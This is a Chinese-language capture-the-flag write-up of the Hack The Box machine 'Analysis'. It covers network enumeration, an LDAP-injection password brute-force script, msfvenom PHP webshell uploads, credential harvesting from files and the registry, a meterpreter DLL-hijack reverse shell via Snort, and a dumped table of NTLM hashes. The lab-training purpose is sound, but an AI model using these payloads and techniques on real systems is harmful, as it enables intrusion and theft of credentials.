基本信息

端口扫描

80,3306,和常规域靶机端口,可以看到domain是analysis.htb:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
$ nmap -sC -sV 10.10.11.250
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-22 13:43 CST
Nmap scan report for 10.10.11.250
Host is up (0.14s latency).
Not shown: 987 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-01-22 05:44:20Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3306/tcp open  mysql         MySQL (unauthorized)
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-01-22T05:44:29
|_  start_date: N/A
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.26 seconds

80

直接ip访问是404,直接对ip扫描目录也没什么东西:

子域名扫描

添加hosts后扫描子域名,发现internal:

1
2
3
4
5
6
10.10.11.250 analysis.htb

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://analysis.htb/" -H 'Host: FUZZ.analysis.htb'

[Status: 403, Size: 1268, Words: 74, Lines: 30, Duration: 134ms]
    * FUZZ: internal

internal

同样加hosts后访问,这次是IIS的403:

(是法语比较坑,HTB怎么接受一个法语机器的)

internal

目录扫描

再次针对internal进行目录扫描,发现一些文件,dashboard里基本没什么东西:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://internal.analysis.htb/
/dashboard            (Status: 301) [Size: 174] [--> http://internal.analysis.htb/dashboard/]
/employees            (Status: 301) [Size: 174] [--> http://internal.analysis.htb/employees/]
/users                (Status: 301) [Size: 170] [--> http://internal.analysis.htb/users/]

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://internal.analysis.htb/dashboard/
/css                  (Status: 301) [Size: 178] [--> http://internal.analysis.htb/dashboard/css/]
/img                  (Status: 301) [Size: 178] [--> http://internal.analysis.htb/dashboard/img/]
/index.php            (Status: 200) [Size: 38]
/js                   (Status: 301) [Size: 177] [--> http://internal.analysis.htb/dashboard/js/]
/lib                  (Status: 301) [Size: 178] [--> http://internal.analysis.htb/dashboard/lib/]
/uploads              (Status: 301) [Size: 182] [--> http://internal.analysis.htb/dashboard/uploads/]

# 上面知道是php,重新扫描一次dashboard
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://internal.analysis.htb/dashboard/ -x php
/details.php          (Status: 200) [Size: 35]
/emergency.php        (Status: 200) [Size: 35]
/form.php             (Status: 200) [Size: 35]
/index.php            (Status: 200) [Size: 38]
/logout.php           (Status: 302) [Size: 3] [--> ../employees/login.php]
/tickets.php          (Status: 200) [Size: 35]
/upload.php           (Status: 200) [Size: 0]

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://internal.analysis.htb/users/ -x php
/list.php             (Status: 200) [Size: 17]

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://internal.analysis.htb/employees/ -x php
/Login.php            (Status: 200) [Size: 1085]
/login.php            (Status: 200) [Size: 1085]

employees

需要登录:

users

直接访问缺少参数,下一步就是探测参数:

枚举参数发现name:

technician

简单的直接name设置为星号,发现technician

LDAP注入

实际上这里是ldap注入:

names

names那里利用ldap注入可以获取其他用户名(暂时用不到):

1
2
3
4
5
6
7
8
9
10
11
technician
amanson
jangel
badam
lzen
cwilliams
webservice
jdoe
soc_analyst
wsmith
svc_web

Description

因为是windows机器,很常规的去查看Description,根据请求响应差异来获取:

最终获取到technician的密码(实际内容中有一些特殊字符,避坑):

1
97nttl*4qp96bv

ldap.py

队友写的脚本,因为中间的特殊符号,分两部分爆破:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
import requests
import logging as log 
import string

log.basicConfig(level=log.DEBUG, format="%(message)s")

PREFIX = "technician)(Description="
CHECK_NAME = "technician"


def check_data(data):
    log.debug(f"Checking: {data}")
    r = requests.get(f"http://internal.analysis.htb//users/list.php?name={PREFIX}{data}")
    if "</table>" == r.text:
        log.debug(f"Error: {data}")
        return False
    elif f"{CHECK_NAME}" in r.text:
        log.debug(f"Success: {data}")
        return True
    else:
        log.debug(f"False: {data}")
        return False
        

WORDARRAY = [i for i in string.ascii_letters + string.digits]
WORDARRAY.append("\=")
WORDARRAY.append("\*")
WORDARRAY.append("\#")
WORDARRAY.append("{")
WORDARRAY.append("}")
WORDARRAY.append("\(")
WORDARRAY.append("\)")



def check_append():
    result = ""
    while True:
        for i in WORDARRAY:
            if check_data(result + i + "*"):
                result += i
                log.debug(f"Result: {result}")
                break
        else:
            break
    return result
    
def check_prepend():
    result = ""
    while True:
        for i in WORDARRAY:
            if check_data("*" + i + result):
                result = i + result
                log.debug(f"Result: {result}")
                break
        else:
            break
    return result
    
def main():
    log.info(check_prepend())
    log.info(check_append())
    

if __name__ == "__main__":
    main()

dashboard

得到的账号密码可以登录dashboard:

1
2
technician@analysis.htb
97nttl*4qp96bv

webshell

然后soc report那里可以直接上传webshell,路径就是前面可以看到的uploads:

1
2
3
4
msfvenom -p php/reverse_php LHOST=10.10.16.12 LPORT=4444 -f raw > shell.php
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.16.12 LPORT=4444 -f raw > shell.php

http://internal.analysis.htb/dashboard/uploads/shell.php

webshell很快就断,自己再加载个常规reverse shell:

信息

翻文件,C:\inetpub\internal\users\list.php中可以得到webservice账号密码:

1
2
3
$ldap_password = 'N1G6G46G@G!j';
$ldap_username = 'webservice@analysis.htb';
$ldap_connection = ldap_connect("analysis.htb");

常规枚举也可以发现jdoe密码:

自动枚举工具基本都能发现这部分,手动就直接查注册表

1
2
3
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
jdoe
7y4Z4^*y9Zzj

(另外还有一种方式是在C:\inetpub\logs\LogFiles\W3SVC2\u_ncsa1.log文件中得到jdoe密码)

1
PS C:\inetpub\logs\LogFiles\W3SVC2> findstr alert_panel.php u_ncsa1.log

user flag

jdoe用户登录,桌面得到user flag:

1
evil-winrm -i 10.10.11.250 -u jdoe -p "7y4Z4^*y9Zzj"

非预期root

绝对是非预期,web用户可以直接写dll到C:\Snort\lib\snort_dynamicpreprocessor,dll劫持:

1
2
3
msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=10.10.16.12 LPORT=4444 -o sf_engine.dll

*Evil-WinRM* PS C:\Snort\lib\snort_dynamicpreprocessor> upload sf_engine.dll

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
meterpreter > hashdump
Administrateur:500:aad3b435b51404eeaad3b435b51404ee:584d96946e4ad1ddfa4f8d7938faf91d:::
Invité:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8549ecd32b0253e9894a422299fe2466:::
jdoe:1103:aad3b435b51404eeaad3b435b51404ee:190193db2c6c6d69c60cf5af64447ce0:::
soc_analyst:1104:aad3b435b51404eeaad3b435b51404ee:d6f020bbee8043520eb569e540913bd4:::
cwilliams:1105:aad3b435b51404eeaad3b435b51404ee:ce88373ebd6d687eac0a405734a266aa:::
technician:1106:aad3b435b51404eeaad3b435b51404ee:ce88373ebd6d687eac0a405734a266aa:::
webservice:1107:aad3b435b51404eeaad3b435b51404ee:780b446d7d76a85880ce49a387f18642:::
wsmith:1109:aad3b435b51404eeaad3b435b51404ee:3da4104738938858384180964346fc6c:::
jangel:1110:aad3b435b51404eeaad3b435b51404ee:eea7337a28121aab144ca78fed48fc7e:::
lzen:1111:aad3b435b51404eeaad3b435b51404ee:eea7337a28121aab144ca78fed48fc7e:::
svc_web:2101:aad3b435b51404eeaad3b435b51404ee:cf74f3b0e86e17fba5051e261b9785b2:::
amanson:2103:aad3b435b51404eeaad3b435b51404ee:5d5b796cd37d9e19d9d1ae10c22ffa78:::
badam:2104:aad3b435b51404eeaad3b435b51404ee:5d5b796cd37d9e19d9d1ae10c22ffa78:::
DC-ANALYSIS$:1000:aad3b435b51404eeaad3b435b51404ee:2ec9198220c4bb7306ba170b7fa007f9:::

参考资料